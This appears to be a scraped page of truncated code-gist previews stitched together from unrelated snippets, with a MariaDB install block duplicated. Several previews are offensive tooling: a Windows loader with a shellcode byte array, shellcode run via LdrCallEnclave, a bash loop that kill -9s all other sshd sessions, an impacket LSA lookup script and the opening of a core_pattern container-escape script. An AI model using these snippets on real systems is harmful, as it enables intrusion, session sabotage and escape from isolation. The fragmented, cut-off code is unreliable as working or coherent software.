5 min POC inspired by https://x.com/IceSolst/status/1986764951940124676?s=20
# Install MariaDB
sudo dnf install mariadb-server mariadb -y
# Start and enable service
sudo systemctl start mariadb
sudo systemctl enable mariadb
5 min POC inspired by https://x.com/IceSolst/status/1986764951940124676?s=20
# Install MariaDB
sudo dnf install mariadb-server mariadb -y
# Start and enable service
sudo systemctl start mariadb
sudo systemctl enable mariadb
| /* | |
| ## File Descriptor INT_MAX Overflow | |
| ---- | |
| - Info: | |
| Tweet: https://x.com/spendergrsec/status/1958264076162998771 | |
| Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370 |
| MY_TTY=$(tty | sed 's/\/dev\///') | |
| MY_SESSION_PIDS=$(ps aux | grep "sshd-session.*$MY_TTY" | awk '{print $2}' | tr '\n' '|' | sed 's/|$//') | |
| echo "Protecting PIDs: $MY_SESSION_PIDS" | |
| while true; do | |
| ps aux | grep 'sshd-session' | grep -v grep | grep -v '\[listener\]' | awk '{print $2}' | grep -vE "^($MY_SESSION_PIDS)$" | xargs -r kill -9 2>/dev/null | |
| sleep 0.01 # Check every 10ms - way faster | |
| done |
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
| #include <stdio.h> | |
| #include <windows.h> | |
| // Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12 | |
| // Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll | |
| EXTERN_C NTSYSAPI | |
| NTSTATUS | |
| NTAPI LdrCallEnclave( | |
| _In_ PENCLAVE_ROUTINE Routine, |
| stream { | |
| map $ssl_preread_server_name $singbox { | |
| trojan.example.com trojan; | |
| trojan-ws.example.com trojan-ws; | |
| trojan-ws-6.example.com trojan-ws-6; | |
| vmess.example.com vmess; | |
| vmess-ws.example.com vmess-ws; | |
| vmess-ws-6.example.com vmess-ws-6; | |
| } | |
| upstream trojan { |
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify | |
| from random import randbytes | |
| import sys | |
| # Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848) | |
| # Tested with impacket 0.12.0 on GOAD |
| # Copyright (c) 2023 Ho Kim ([email protected]). All rights reserved. | |
| # Configure environment variables | |
| ARG ROCKYLINUX_VERSION="8" | |
| # Be ready for serving | |
| FROM "quay.io/rockylinux/rockylinux:${ROCKYLINUX_VERSION}" as base | |
| # Install desktop environment dependencies | |
| RUN dnf install -y \ |
| #!/usr/bin/env python | |
| # Impacket - Collection of Python classes for working with network protocols. | |
| # | |
| # Copyright Fortra, LLC and its affiliated companies | |
| # | |
| # All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. |
| #!/bin/bash | |
| # | |
| # core_pattern_escape.sh | |
| # Simple script to escape a container via /proc/sys/kernel/core_pattern | |
| # By J. Stuart McMurray | |
| # Created 20241026 | |
| # Last Modified 20241026 | |
| # Drop to /esc (or whatever name) in a container and... | |
| # |